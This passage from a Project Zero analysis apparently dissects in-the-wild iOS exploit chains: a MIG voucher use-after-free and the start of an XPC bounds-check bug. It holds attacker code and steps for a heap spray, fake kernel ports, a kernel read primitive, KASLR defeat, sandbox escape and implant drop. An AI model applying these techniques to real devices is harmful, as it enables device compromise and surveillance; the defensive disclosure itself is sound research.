     outtran: mach_port_t convert_voucher_to_port(ipc_voucher_t)
     destructor: ipc_voucher_release(ipc_voucher_t);

Here's an annotated version of the autogenerated code which you get after running the MIG tool, and the XNU methods it calls:

What's the fundamental cause of this vulnerability? It's probably that MIG is very hard to use and the only way to safely use it is to very carefully read the auto-generated code. If you search for documentation on how to use MIG correctly, there just isn't any publicly available.
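
To illustrate why reading the generated code matters, here is a toy user-space model of the reference counting around task_swap_mach_voucher. It rests on three assumptions about the generated wrapper, based on the intran, outtran and destructor annotations in the MIG definition above: intran takes one reference on each voucher argument, the destructor releases new_voucher after the call, and outtran consumes one reference on whatever old_voucher points to afterwards. All toy_* names are hypothetical and nothing here is XNU code.

```c
#include <assert.h>
#include <stddef.h>

/* Toy voucher: only the reference count matters here. */
struct toy_voucher { int refs; };

/* Stand-in for intran (convert_port_to_voucher): takes a reference. */
static struct toy_voucher *toy_intran(struct toy_voucher *v) {
    if (v != NULL) v->refs++;
    return v;
}

/* Stand-in for the destructor (ipc_voucher_release): drops a reference. */
static void toy_release(struct toy_voucher *v) {
    if (v != NULL) v->refs--;
}

/* Stand-in for outtran (convert_voucher_to_port): consumes a reference. */
static void toy_outtran(struct toy_voucher *v) {
    if (v != NULL) v->refs--;
}

/* Same logic as the placeholder implementation shown earlier. */
static void toy_task_swap_mach_voucher(struct toy_voucher *new_voucher,
                                       struct toy_voucher **in_out_old_voucher) {
    *in_out_old_voucher = new_voucher;
}

/* Toy version of the wrapper that sits between the message and the routine. */
static void toy_mig_wrapper(struct toy_voucher *new_port,
                            struct toy_voucher *old_port) {
    struct toy_voucher *new_voucher = toy_intran(new_port);
    struct toy_voucher *old_voucher = toy_intran(old_port);
    toy_task_swap_mach_voucher(new_voucher, &old_voucher);
    toy_release(new_voucher);  /* balances the intran on new_voucher */
    toy_outtran(old_voucher);  /* old_voucher now aliases new_voucher */
}
```

Under those assumptions each call drops one reference too many on new_voucher, while the reference taken on the original old_voucher is never returned. A voucher that starts with two references ends one call with a single reference although both of its holders still exist.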

The takeaway here is that whilst the underlying cause of the vulnerability may be obscure, the fact remains that triggering and finding it is incredibly simple.

Again, unfortunately, these concerns aren't theoretical; this exact issue was being exploited in the wild.

Exploitation

To understand the exploit for this bug we need to understand something about what a mach voucher actually is. Brandon Azad nicely sums it up in his post: "an IPC voucher represents a set of arbitrary attributes that can be passed between processes via a send right in a Mach message."

Concretely, a voucher is represented in the kernel by the following structure:

/*
 * IPC Voucher
 *
 * Vouchers are a reference counted immutable (once-created) set of
 * indexes to particular resource manager attribute values
 * (which themselves are reference counted).
 */
struct ipc_voucher {
  iv_index_t    iv_hash;        /* checksum hash */
  iv_index_t    iv_sum;         /* checksum of values */
  os_refcnt_t   iv_refs;        /* reference count */
  iv_index_t    iv_table_size;  /* size of the voucher table */
  iv_index_t    iv_inline_table[IV_ENTRIES_INLINE];
  iv_entry_t    iv_table;       /* table of voucher attr entries */
  ipc_port_t    iv_port;        /* port representing the voucher */
  queue_chain_t iv_hash_link;   /* link on hash chain */
};

By supplying "recipes" to the host_create_mach_voucher host port MIG method you can create vouchers and get send rights to the mach ports representing those vouchers. Another important point is that vouchers are meant to be unique; for a given set of keys and values there is exactly one mach port representing them; providing the same set of keys and values in another recipe should yield the same voucher and voucher port.

Vouchers are allocated from their own zone (ipc_voucher_zone) and they are reference counted objects with the reference count stored in the iv_refs field.

Since an exploit targeting a use-after-free vulnerability in mach vouchers is likely to have to create many vouchers, Brandon's exploit created USER_DATA vouchers, a type that contains user-controlled data such that he could always ensure a new voucher was created:

static mach_port_t
create_voucher(uint64_t id) {
  assert(host != MACH_PORT_NULL);
  static uint64_t uniqueness_token = 0;
  if (uniqueness_token == 0) {
    uniqueness_token = (((uint64_t)arc4random()) << 32) | getpid();
  }

  mach_port_t voucher = MACH_PORT_NULL;

#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wgnu-variable-sized-type-not-at-end"
  struct __attribute__((packed)) {
    mach_voucher_attr_recipe_data_t user_data_recipe;
    uint64_t user_data_content[2];
  } recipes = {};
#pragma clang diagnostic pop

  recipes.user_data_recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;
  recipes.user_data_recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;
  recipes.user_data_recipe.content_size = sizeof(recipes.user_data_content);
  recipes.user_data_content[0] = uniqueness_token;
  recipes.user_data_content[1] = id;
  kern_return_t kr = host_create_mach_voucher(
    host,
    (mach_voucher_attr_raw_recipe_array_t) &recipes,
    sizeof(recipes),
    &voucher);
  assert(kr == KERN_SUCCESS);
  assert(MACH_PORT_VALID(voucher));
  return voucher;
}

Both @S0rryMybad and the attackers instead realised that ATM vouchers created with the following recipe are always unique. This same structure is used in both @S0rryMybad's PoC and the in-the-wild exploit:

mach_voucher_attr_recipe_data_t atm_data = {
  .key = MACH_VOUCHER_ATTR_KEY_ATM,
  .command = 510
};

Exploit strategy
As usual they determine whether this is a 4k or 16k device via the hw.memsize sysctl. They create a new, suspended thread and get its thread port; they'll use this later.

They will again use the pipe buffer technique so they increase the open file limit and allocate 0x800 pipes. They allocate two sets of ports (ports_a, ports_b) and two standalone ports.

They allocate an ATM voucher; they'll use this right at the end. They force a GC, using the memory pressure technique again.

They allocate 0x2000 "before" vouchers. These are ATM vouchers, which means they're all unique, so this allocates large regions of new ipc_voucher structures and new ipc_ports.

for ( k = 0; k < 0x2000; ++k ) {
  host_create_mach_voucher(mach_host_self(),
                           voucher_recipe,
                           0x10,
                           &before_voucher_ports[k]);
}
They allocate a target voucher:

host_create_mach_voucher(mach_host_self(), voucher_recipe, 0x10, &target_voucher_port);
They allocate 0x1000 "after" vouchers:

for ( k = 0; k < 0x1000; ++k ) {
  host_create_mach_voucher(mach_host_self(),
                           voucher_recipe,
                           0x10,
                           &after_voucher_ports[k]);
}
They're trying here to get the target voucher on a page where they also control the lifetime of all the other vouchers on that page; this is similar to the ipc_port UaF techniques:

They assign the voucher port to the sleeping thread via thread_set_mach_voucher.
This increases the reference count of the voucher to 2; one held by the port, and one held by the thread:

thread_set_mach_voucher(sleeping_thread_mach_port, target_voucher_port);

They trigger the vuln:

old_voucher = MACH_PORT_NULL;
task_swap_mach_voucher(mach_task_self(),
                       target_voucher_port,
                       &old_voucher);
Again, I want to emphasize that there's absolutely nothing special about this trigger code; this is the intended way to use this API.

After this point there are two reference-counted pointers to the voucher (one from the mach port to the voucher, the other from the sleeper thread's struct thread) but the voucher only has one reference.
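The imbalance described above can be modelled in a few lines of user-space C. This is only a toy sketch: toy_voucher, toy_holder and the helper functions are hypothetical names, not XNU code, and the "free" is simulated with a flag so nothing is actually deallocated.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy stand-in for a reference-counted kernel object (hypothetical). */
struct toy_voucher {
    int  refs;   /* plays the role of iv_refs */
    bool freed;  /* set when the count reaches zero */
};

/* Something that stores a pointer and is supposed to own one reference. */
struct toy_holder {
    struct toy_voucher *v;
};

static void toy_retain(struct toy_voucher *v) { v->refs++; }

static void toy_release(struct toy_voucher *v) {
    assert(v->refs > 0);
    if (--v->refs == 0)
        v->freed = true;  /* a real kernel would free the memory here */
}

/* Replays the sequence from the text; returns true if the thread's
 * pointer still refers to an object that has been "freed". */
static bool toy_thread_pointer_dangles(void) {
    struct toy_voucher v = { .refs = 0, .freed = false };
    struct toy_holder port = { NULL }, thread = { NULL };

    port.v = &v;
    toy_retain(&v);    /* reference held by the voucher port */
    thread.v = &v;
    toy_retain(&v);    /* reference held by the thread */

    toy_release(&v);   /* the bug: one reference dropped too many */

    port.v = NULL;
    toy_release(&v);   /* destroying the port drops the last reference */

    return thread.v != NULL && thread.v->freed;
}
```

Two holders, one remaining reference: as soon as either holder lets go, the other is left with a dangling pointer.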

They destroy the before ports:

for (m = 4096; m < 0x2000; ++m) {
  mach_port_destroy(mach_task_self(), before_voucher_ports[m]);
}
then the target port:

mach_port_destroy(mach_task_self(), target_voucher_port);
and finally the after ports:

for (m = 4096; m < 0x1000; ++m) {
  mach_port_destroy(mach_task_self(), after_voucher_ports[m]);
}
Since the target voucher object only had one reference remaining, destroying the target_voucher_port will free the voucher as the reference count goes to zero, but the sleeper thread's ith_voucher field will still point to the now-free'd voucher.

They force a zone GC, making the page containing the voucher available to be reallocated by another zone.

They send 80MB of page-sized out-of-line memory descriptors in mach messages; each of which contains repeating fake, empty voucher structures with an iv_refs field set to 0x100 and all other fields set to 0:

These are sent in 20 messages, one each to the first 20 ports in ports_a.
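As a rough sketch of what one page of that spray could contain, the snippet below fills a buffer with back-to-back fake vouchers. Everything about the layout is an assumption made for illustration: the field widths, IV_ENTRIES_INLINE being 8, the 16k page size, and the idea that the fake structures tile the page from offset 0. The names fake_voucher and fill_fake_vouchers are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SPRAY_PAGE_SIZE        0x4000u  /* assumed 16k page */
#define FAKE_IV_ENTRIES_INLINE 8        /* assumed value of IV_ENTRIES_INLINE */

/* Assumed user-space mirror of struct ipc_voucher (widths are guesses). */
struct fake_voucher {
    uint32_t iv_hash;
    uint32_t iv_sum;
    uint32_t iv_refs;
    uint32_t iv_table_size;
    uint32_t iv_inline_table[FAKE_IV_ENTRIES_INLINE];
    uint64_t iv_table;
    uint64_t iv_port;
    uint64_t iv_hash_link[2];
};

_Static_assert(sizeof(struct fake_voucher) == 0x50,
               "the sketch assumes an 0x50-byte voucher");

/* Fill a page with empty fake vouchers whose only non-zero field is
 * iv_refs = 0x100. Returns the number of fake vouchers written. */
static size_t fill_fake_vouchers(uint8_t *page, size_t page_size) {
    size_t count = page_size / sizeof(struct fake_voucher);
    memset(page, 0, page_size);
    for (size_t i = 0; i < count; i++) {
        struct fake_voucher fv = {0};
        fv.iv_refs = 0x100;
        memcpy(page + i * sizeof(fv), &fv, sizeof(fv));
    }
    return count;
}
```

With 80MB spread over 20 messages, each message would carry about 4MB of such pages.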

They allocate another 0x2000 ports, discloser_before_ports.

They allocate a neighbour target port and set the context value to 0x1337733100; it's at first unclear why they do this but the reason will become clear in the end.

They then call thread_get_mach_voucher, passing the sleeper thread's thread port:

discloser_mach_port = MACH_PORT_NULL;
thread_get_mach_voucher(sleeping_thread_mach_port, 0, &discloser_mach_port);
Here's the kernel-side implementation of that method; recall that ith_voucher is a dangling pointer to the voucher, and they tried to replace what it points to with the out-of-line memory descriptor buffers:

kern_return_t
thread_get_mach_voucher(
  thread_act_t            thread,
  mach_voucher_selector_t __unused which,
  ipc_voucher_t*          voucherp)
{
  ipc_voucher_t voucher;
  mach_port_name_t voucher_name;

  if (THREAD_NULL == thread)
    return KERN_INVALID_ARGUMENT;

  thread_mtx_lock(thread);
  voucher = thread->ith_voucher;  // read the dangling pointer
                                  // which should now point in to an OOL desc
                                  // backing buffer

  /* if already cached, just return a ref */
  if (IPC_VOUCHER_NULL != voucher) {
    ipc_voucher_reference(voucher);
    thread_mtx_unlock(thread);
    *voucherp = voucher;
    return KERN_SUCCESS;
  }
...
The autogenerated MIG wrapper will then call convert_voucher_to_port on that returned (dangling) voucher pointer:

RetCode = thread_get_mach_voucher(thr_act, In0P->which, &voucher);
thread_deallocate(thr_act);
if (RetCode != KERN_SUCCESS) {
  MIG_RETURN_ERROR(OutP, RetCode);
}
...
OutP-> = (mach_port_t)convert_voucher_to_port(voucher);
Here's convert_voucher_to_port:

ipc_port_t
convert_voucher_to_port(ipc_voucher_t voucher)
{
  ipc_port_t port, send;

  if (IV_NULL == voucher)
    return (IP_NULL);

  /* create a port if needed */
  port = voucher->iv_port;
  if (!IP_VALID(port)) {
    port = ipc_port_alloc_kernel();
    ipc_kobject_set_atomically(port, (ipc_kobject_t) voucher, IKOT_VOUCHER);
...
    /* If we lose the race, deallocate and pick up the other guy's port */
    if (!OSCompareAndSwapPtr(IP_NULL, port, &voucher->iv_port)) {
      ipc_port_dealloc_kernel(port);
      port = voucher->iv_port;
    }
  }

  ip_lock(port);
  send = ipc_port_make_send_locked(port);
...
  return (send);
}
The ipc_voucher structure which is being processed here is in reality now backed by one of the out-of-line memory descriptor backing buffers they sent to the ports_a ports. Since they set all the fields apart from the reference count to 0 the iv_port field will be NULL. That means the kernel will allocate a new port (via ipc_port_alloc_kernel()) then write that ipc_port pointer into the voucher object. OSCompareAndSwap will set the voucher->iv_port field to port:

    if (!OSCompareAndSwapPtr(IP_NULL, port, &voucher->iv_port)) { ...
If everything up until now has worked, this will have the effect of writing the voucher port's address into the out-of-line memory descriptor buffer.
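To make the effect of that compare-and-swap concrete, here is a small user-space model using C11 atomics. It is only a sketch under stated assumptions: model_voucher and model_convert_voucher_to_port are hypothetical names, ports are represented as plain integers, and atomic_compare_exchange_strong stands in for OSCompareAndSwapPtr.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdint.h>

/* Hypothetical stand-in for the attacker-supplied fake voucher: every
 * field is zero, so iv_port starts out as NULL (0). */
struct model_voucher {
    _Atomic(uintptr_t) iv_port;
};

/* Models the "create a port if needed" logic: if iv_port is empty,
 * publish new_port with a compare-and-swap; otherwise (or if the race
 * is lost) return whatever is already stored there. */
static uintptr_t model_convert_voucher_to_port(struct model_voucher *v,
                                               uintptr_t new_port) {
    uintptr_t port = atomic_load(&v->iv_port);
    if (port == 0) {
        uintptr_t expected = 0;
        if (atomic_compare_exchange_strong(&v->iv_port, &expected, new_port))
            port = new_port;   /* the pointer is now written into the voucher */
        else
            port = expected;   /* lost the race: use the other port */
    }
    return port;
}
```

Because the fake voucher lives in memory the attackers can later read back, the first call is what plants the newly allocated port's address in their buffer.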

They allocate another 0x1000 ports, again trying to ensure ownership of the whole page surrounding the neighbour and fake voucher ports:

for ( ll = 0; ll < 0x1000; ++ll ) {  mach_port_allocate(mach_task_self(), 1, &discloser_after_ports[ll]);}

Let's look diagrammatically at what's going on:

They receive the out-of-line memory descriptors until they see one which has something that looks like a kernel pointer in it; they check that the iv_refs field is 0x101 (they set it to 0x100, and the creation of the new voucher port added an extra reference). If such a port is found they reallocate the out-of-line descriptor memory again, but this time they bump up the ipc_port pointer to point to the start of the next 16k page:
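The scan and the page rounding described above might look roughly like the following. This is a sketch, not the attackers' code: the 0x50-byte fake voucher size and the field offsets are assumptions, and looks_like_kernel_pointer uses a deliberately crude heuristic (top 28 bits all set) chosen only for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define FAKE_VOUCHER_SIZE 0x50  /* assumed size of one fake voucher */
#define IV_REFS_OFFSET    0x08  /* assumed offset of iv_refs */
#define IV_PORT_OFFSET    0x38  /* assumed offset of iv_port */

/* Crude heuristic: treat 0xfffffffX_XXXXXXXX as a kernel pointer. */
static int looks_like_kernel_pointer(uint64_t v) {
    return (v >> 36) == 0xfffffffull;
}

/* Walk a received out-of-line buffer one fake voucher at a time.
 * Returns the disclosed iv_port value, or 0 if nothing was modified. */
static uint64_t find_disclosed_port(const uint8_t *buf, size_t len) {
    for (size_t off = 0; off + FAKE_VOUCHER_SIZE <= len;
         off += FAKE_VOUCHER_SIZE) {
        uint32_t refs;
        uint64_t port;
        memcpy(&refs, buf + off + IV_REFS_OFFSET, sizeof(refs));
        memcpy(&port, buf + off + IV_PORT_OFFSET, sizeof(port));
        if (refs == 0x101 && looks_like_kernel_pointer(port))
            return port;
    }
    return 0;
}

/* Address of the start of the 16k page following the one holding addr. */
static uint64_t next_16k_page(uint64_t addr) {
    return (addr & ~0x3fffull) + 0x4000;
}
```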

They destroy all the discloser_before and discloser_after ports then force a GC. The reason for moving the iv_port field up by 16k is because when the iv_port field was overwritten they leaked a reference to the fake voucher port, so that zone chunk wouldn't be collected (even if they also free'd the neighbour port, which they didn't do.) But now, the memory pointed to by the fake voucher's iv_port field is available to be reused by a different zone.

At this point they've got the two prerequisites for their kernel read-write primitive: a controllable pointer to an ipc_port, and knowledge of a kernel address where their spray may end up. From here on, they proceed as they did with their previous exploit chains.
Pipes
They build their fake pid_for_task kernel port in 0x800 4k pipe buffers. Since they know the iv_port pointer points to a 4k boundary they build the fake port structure in the lower half of the pipe buffer, and in the upper half at offset +0x800 they write the index of the pipe fd to which this fake port was written, setting up the fake port to read from that address:

void
fill_buf_with_simple_kread_32_port(uint64_t buf,
                                   uint64_t kaddr_of_dangling_port,
                                   uint64_t read_target)
{
  char* fake_port = (char*)buf;
  *(uint32_t*)(buf + 0x00) = 0x80000002;   // IO_ACTIVE | IKOT_TASK
  *(uint32_t*)(buf + 0x04) = 10;           // io_refs
  // kernel address of the fake task, 0x100 past the fake port;
  // this is a pointer, so it needs a 64-bit store
  *(uint64_t*)(buf + 0x68) = kaddr_of_dangling_port + 0x100;
  *(uint32_t*)(buf + 0xA0) = 10;

  char* fake_task = (char*)(buf + 0x100);

  *(uint32_t*)(fake_task + 0x010) = 10;
  *(uint64_t*)(fake_task + 0x368) = read_target - 0x10;
}

  fill_buf_with_simple_kread_32_port(buf,
                                     target_port_next_16k_page,
                                     target_port_next_16k_page + 0x800);

  magic = 0x88880000;

  for (int i = 0; i < 0x800; i++) {
    *(uint32_t*)&buf[2048] = i + magic;
    write(pipe_fds[2 * i + 1], buf, 0xfff);
  }

They call thread_get_mach_voucher, which will return a send right to the fake task port in one of the pipe buffers, then they call pid_for_task, which will perform the kread32 primitive, reading the u32 value written at offset +0x800 in the replacer pipe buffer:

  thread_get_mach_voucher(sleeping_thread_mach_port,
                          0,
                          &discloser_mach_port);
  replacer_pipe_value = 0;
  pid_for_task(discloser_mach_port, &replacer_pipe_value);
  if ((replacer_pipe_value & 0xFFFF0000) == magic ) {
    ...
From the magic value they're able to determine the file descriptor which corresponds to the pipe buffer which replaced the port memory. They now have all the requirements for the simple kread32 primitive.
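The tagging scheme is simple enough to sketch in isolation. The constants come from the listing above (magic 0x88880000, 0x800 pipes); the function names tag_for_pipe and pipe_index_from_tag are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define PIPE_MAGIC 0x88880000u
#define N_PIPES    0x800u

/* Value written at offset +0x800 of the buffer sent to pipe number i. */
static uint32_t tag_for_pipe(uint32_t i) {
    return PIPE_MAGIC + i;
}

/* Recover the pipe number from a value read back with the kread32
 * primitive; returns -1 if the value does not carry the magic. */
static int pipe_index_from_tag(uint32_t value) {
    if ((value & 0xFFFF0000u) != PIPE_MAGIC)
        return -1;
    uint32_t index = value & 0xFFFFu;
    return index < N_PIPES ? (int)index : -1;
}
```

Given an index i, the listing above implies the write end of the matching pipe is pipe_fds[2 * i + 1], so the read end would be pipe_fds[2 * i].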

They use the kread32 to search in the vicinity of the originally disclosed fake voucher port address for an ipc_port structure with an ip_context value of 0x1337733100. This is the context value which they gave the neighbour port right at the start. The search proceeds outwards from the disclosed port address; if they find it they read the field at +0x60 in the ipc_port, which is the ip_receiver field.

The receive right for this port is owned by this task, so the ipc_port's ip_receiver field will point to their task's struct ipc_space. They read the pointer at offset +0x28, which points to their task structure. They read the task structure's proc pointer then traverse the doubly-linked list of processes backwards until they find a value where the lower 21 bits match the offset of the allproc list head, which they read from the offsets object for this device they loaded at the start. Once that's found they can determine the KASLR slide by subtracting the unslid value of the allproc symbol from the runtime observed value.
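The arithmetic behind that last step can be sketched as follows. It assumes, as the 21-bit comparison in the text implies, that the slide is a multiple of 0x200000 so the low 21 bits of a kernel address survive sliding. The function names and the example addresses in the usage note are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* True if two addresses agree in their lower 21 bits, i.e. they could
 * be the same symbol before and after a 2MB-granular slide. */
static int low21_match(uint64_t runtime_addr, uint64_t unslid_addr) {
    return ((runtime_addr ^ unslid_addr) & 0x1fffffull) == 0;
}

/* Slide = address observed at runtime minus the link-time address. */
static uint64_t kaslr_slide(uint64_t runtime_addr, uint64_t unslid_addr) {
    return runtime_addr - unslid_addr;
}
```

For example, with a made-up unslid allproc address of 0xfffffff0076a1b28 and an observed value of 0xfffffff01bca1b28, the low 21 bits match and the slide comes out as 0x14600000.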

With the KASLR slide they are able to read the kernel_task pointer and find the address of the kernel vm_map. This is all they require to build the standard fake kernel task in the pipe buffer, giving them kernel memory read/write.
Unsandboxing
They traverse the allproc linked list of processes looking for their own process and launchd. They temporarily assign themselves launchd's credential structures, thereby inheriting launchd's sandbox profile. They patch the platform policy sandbox profile bytecode in memory. They read the embedded implant from the __DATA:__file section, compute the CDHash and add the CDHash to the trustcache using the kernel arbitrary write.

They drop the implant payload binary in /tmp/updateserver and execute it via posix_spawn.

They mark the device as compromised by setting the value of the kern.maxfilesperproc sysctl to 0x27ff.
Cleanup
They no longer need the fake kernel task port, so it's destroyed. The fake kernel task port had a reference count of 0x2000, so it won't be freed. They close all the pipes, and return. They ping an HTTP server to indicate successful compromise of another target.

In-the-wild iOS Exploit Chain 3

30 August 2019 - 02:04
Posted by Ian Beer, Project Zero


This chain targeted iOS 11-11.4.1, spanning almost 10 months. This is the first chain we observed which had a separate sandbox escape exploit.

The sandbox escape vulnerability was a severe security regression in libxpc, where refactoring led to a < bounds check becoming a != comparison against the boundary value. The value being checked was read directly from an IPC message, and used to index an array to fetch a function pointer.

It’s difficult to understand how this error could be introduced into a core IPC library that shipped to end users. While errors are common in software development, a serious one like this should have quickly been found by a unit test, code review or even fuzzing. It’s especially unfortunate as this location would naturally be one of the first places an attacker would look, as I detail below.
In-the-wild iOS Exploit Chain 3 - XPC + VXD393/D5500 repeated IOFree
targets: 5s through X, 11.0 through 11.4

Devices:
iPhone6,1 (5s, N51AP)
iPhone6,2 (5s, N53AP)
iPhone7,1 (6 plus, N56AP)
iPhone7,2 (6, N61AP)
iPhone8,1 (6s, N71AP)
iPhone8,2 (6s plus, N66AP)
iPhone8,4 (SE, N69AP)
iPhone9,1 (7, D10AP)
iPhone9,2 (7 plus, D11AP)
iPhone9,3 (7, D101AP)
iPhone9,4 (7 plus, D111AP)
iPhone10,1 (8, D20AP)
iPhone10,2 (8 plus, D21AP)
iPhone10,3 (X, D22AP)
iPhone10,4 (8, D201AP)
iPhone10,5 (8 plus, D211AP)
iPhone10,6 (X, D221AP)

Versions:
15A372 (11.0 - 19 Sep 2017)
15A402 (11.0.1 - 26 Sep 2017)
15A403 (11.0.2 - 26 Sep 2017 - seems to be 8/8plus only, which didn't get 15A402)
15A421 (11.0.2 - 3 Oct 2017)
15A432 (11.0.3 - 11 Oct 2017)
15B93 (11.1 - 31 Oct 2017)
15B150 (11.1.1 - 9 Nov 2017)
15B202 (11.1.2 - 16 Nov 2017)
15C114 (11.2 - 2 Dec 2017)
15C153 (11.2.1 - 13 Dec 2017)
15C202 (11.2.2 - 8 Jan 2018)
15D60 (11.2.5 - 23 Jan 2018)
15D100 (11.2.6 - 19 Feb 2018)
15E216 (11.3 - 29 Mar 2018)
15E302 (11.3.1 - 24 Apr 2018)
15F79 (11.4 - 29 May 2018)

first unsupported version: 11.4.1 - 9 July 2018
Binary structure
Starting from this third chain the privesc binaries have a different structure. Rather than using the system loader and linking against the required symbols, they instead resolve all the required symbols themselves via dlsym (with the address of dlsym getting passed in from the JSC exploit.) Here's a snippet from the start of the symbol resolution function:

  syscall  = dlsym(RTLD_DEFAULT, "syscall");
  memcpy   = dlsym(RTLD_DEFAULT, "memcpy");
  memset   = dlsym(RTLD_DEFAULT, "memset");
  mach_msg = dlsym(RTLD_DEFAULT, "mach_msg");
  stat     = dlsym(RTLD_DEFAULT, "stat");
  open     = dlsym(RTLD_DEFAULT, "open");
  read     = dlsym(RTLD_DEFAULT, "read");
  close    = dlsym(RTLD_DEFAULT, "close");
  ...
Interestingly, this seems to be an append-only list, and there are plenty of symbols which aren't used. In Appendix A I've enumerated those, and guessed what bugs they might have been targeting with earlier versions of this framework.

Checking for prior compromise
Like PE2, after the kernel exploit has successfully run they make a system modification which can be observed from inside the sandbox. This time they add the string "iop114" to the device bootargs which can be read from inside the WebContent sandbox via the kern.bootargs sysctl:

  sysctlbyname("kern.bootargs", bootargs, &v7, 0LL, 0LL);
  // the marker only has to appear somewhere in the bootargs string
  if (strstr(bootargs, "iop114")) {
    syslog(0, "to sleep ...");
    while (1)
      sleep(1000);
  }
Unchecked array index in xpc
XPC (which probably stands for "Cross"-Process Communication) is an IPC mechanism which uses mach messages as a transport layer. It was introduced in 2011 around the time of iOS 5. XPC messages are serialized object trees, typically with a dictionary at the root. XPC also contains functionality for exposing and managing named services; newer IPC services tend to be built on XPC rather than the legacy MIG system.

XPC was marketed as a security boundary; at the 2011 Apple World Wide Developers Conference (WWDC) Apple explicitly stated the benefits of isolation via XPC as "Little to no harm if service is exploited" and that it "Minimizes impact of exploits." Unfortunately, there has been a long history of bugs in XPC; both in the core library as well as in how services used its APIs. See for example the following P0 issues: 80, 92, 121, 130, 1247, 1713. Core XPC bugs are quite useful, as they allow you to target any process which uses XPC.

This particular bug appears to have been introduced via some refactoring in iOS 11 in the way that the XPC code parses serialized xpc dictionary objects in "fast mode". Here's the old code:

struct _context {
  xpc_dictionary* dict;
  char* target_key;
  xpc_serializer* result;
  int* found;
};

int64 _xpc_dictionary_look_up_wire_apply(
  char *current_key,
  xpc_serializer* serializer,
  struct _context *context)
{
  if ( !current_key )
    return 0;

  if (strcmp(context->target_key, current_key))
    return _skip_value(serializer);

  // key matches; result is current state of serializer
  memcpy(context->result, serializer, 0xB0);
  *(context->found) = 1;
  return 0;
}

An xpc_serializer object is a wrapper around a raw, unparsed XPC message. (The xpc_serializer type is responsible for both serialization and deserialization.)

Here's an example serialized XPC message:

In XPC's "slow mode" an incoming message is completely deserialized into XPC objects when it's received. The fast mode instead attempts to lazily search for values inside the serialized dictionaries when they're first requested, rather than parsing everything upfront. It does this by comparing the keys in the serialized dictionary against the desired key; if the current key doesn't match they call skip_value to jump over the payload value of the current key to the next key in the serialized XPC dictionary object.
int skip_value(xpc_serializer* serializer)
{
  uint32_t wireid;
  uint64_t wire_length;

  wireid = read_id(serializer);

  if (wireid == 0x1A000)
    return 0LL;

  wire_length = xpc_types[wireid >> 12]->wire_length(serializer);

  if (wire_length == -1 ||
      wire_length > serializer->remaining)
    return 0;

  // skip over the value
  xpc_serializer_advance(serializer, wire_length);
  return 1;
}

uint32_t read_id(xpc_serializer* serializer)
{
  // ensure there are 4 bytes to be read; return pointer to them
  uint32_t* wireid_ptr = xpc_serializer_read(serializer, 4, 0, 0);
  if ( !wireid_ptr )
    return 0x1A000;

  uint32_t wireid = *wireid_ptr;
  uint32_t typeid = wireid >> 12;

  // if any bits other than 12-20 are set,
  // or the type_index is 0, fail
  if (wireid & 0xFFF00FFF ||
      typeid == 0 ||
      typeid >= _xpc_ntypes) { // 0x19
    return 0x1A000LL;
  }

  return wireid;
}
skip_value first calls read_id, which reads 4 bytes from the serialized message. Those four bytes are the wireid value, which tells XPC the type of the serialized value. read_id also verifies that the wireid is valid: the xpc typeid is contained in bits 12-20 of the wireid, only those bits may be set and the value of the typeid must be greater than zero and less than 0x19. If these conditions aren't met then read_id returns the sentinel wireid value of 0x1A000. skip_value checks for this sentinel return value from read_id and aborts. If read_id returns a valid wireid value, then skip_value uses the typeid bits to index the xpc_types array and call a function pointer read indirectly from there.
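The validation rule is easy to exercise on its own. The sketch below lifts just the checks out of read_id into a pure function; check_wireid and the two constants are hypothetical names, with the values taken from the listing above.

```c
#include <assert.h>
#include <stdint.h>

#define XPC_NTYPES     0x19u     /* value of _xpc_ntypes per the listing */
#define WIREID_INVALID 0x1A000u  /* sentinel returned on failure */

/* Returns wireid unchanged if it names a valid type, else the sentinel. */
static uint32_t check_wireid(uint32_t wireid) {
    uint32_t type_id = wireid >> 12;
    if ((wireid & 0xFFF00FFFu) != 0 ||  /* stray bits outside the type field */
        type_id == 0 ||                 /* index 0 is not a real type */
        type_id >= XPC_NTYPES) {        /* past the last known type */
        return WIREID_INVALID;
    }
    return wireid;
}
```

Under these rules 0x9000 is accepted, while 0x9001, 0x19000 and 0x41414141 all collapse to the sentinel.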

Let's take a look at how this code changed in iOS 11. The prototype for xpc_dictionary_look_up_wire_apply is unchanged:

int64 _xpc_dictionary_look_up_wire_apply(
  char *current_key,
  xpc_serializer* serializer,
  struct _context *context)
{
  if (!current_key)
    return 0;

  if (strcmp(context->target_key, current_key))
    return skip_id_and_value(serializer);

  memcpy(context->result, serializer, 0xB0);
  *(context->found) = 1;
  return 0;
}
The call to skip_value has been replaced with a call to skip_id_and_value however:

int64 skip_id_and_value(xpc_serializer* serializer)
{
  uint32_t* wireid_ptr = xpc_serializer_read(serializer, 4, 0, 0);
  if (!wireid_ptr)
    return 0;

  uint32_t wireid = *wireid_ptr;
  if (wireid != 0x1B000)
    return skip_value(serializer, wireid);
  return 0;
}
There's no call to read_id anymore (which was responsible for both reading and verifying the id); instead skip_id_and_value reads the four-byte wireid value itself. Curiously it compares the four-byte wireid value against 0x1B000. Is this comparison supposed to actually be something like this?

  wireid < 0x1B000
Something seems very wrong.

The controlled wireid value, which can now be any value apart from 0x1B000, is passed to skip_value, which has a different prototype from before: it now takes a wireid in addition to the xpc_serializer:

int64
skip_value(xpc_serializer* serializer, uint32_t wireid)
{
  // declare function pointer
  uint32_t (*wire_length_fptr)(xpc_serializer*);

  wire_length_fptr = xpc_wire_length_from_wire_id(wireid);
  uint32_t wire_length = wire_length_fptr(serializer);

  if (wire_length == -1 ||
      wire_length > serializer->remaining) {
    return 0;
  }
  xpc_serializer_advance(serializer, wire_length);
  return 1;
}

// returns a pointer to the wire_length function for this wireid
uint32_t (*xpc_wire_length_from_wire_id(uint32_t wireid))(xpc_serializer*)
{
  return xpc_types[wireid >> 12]->wire_length;
}
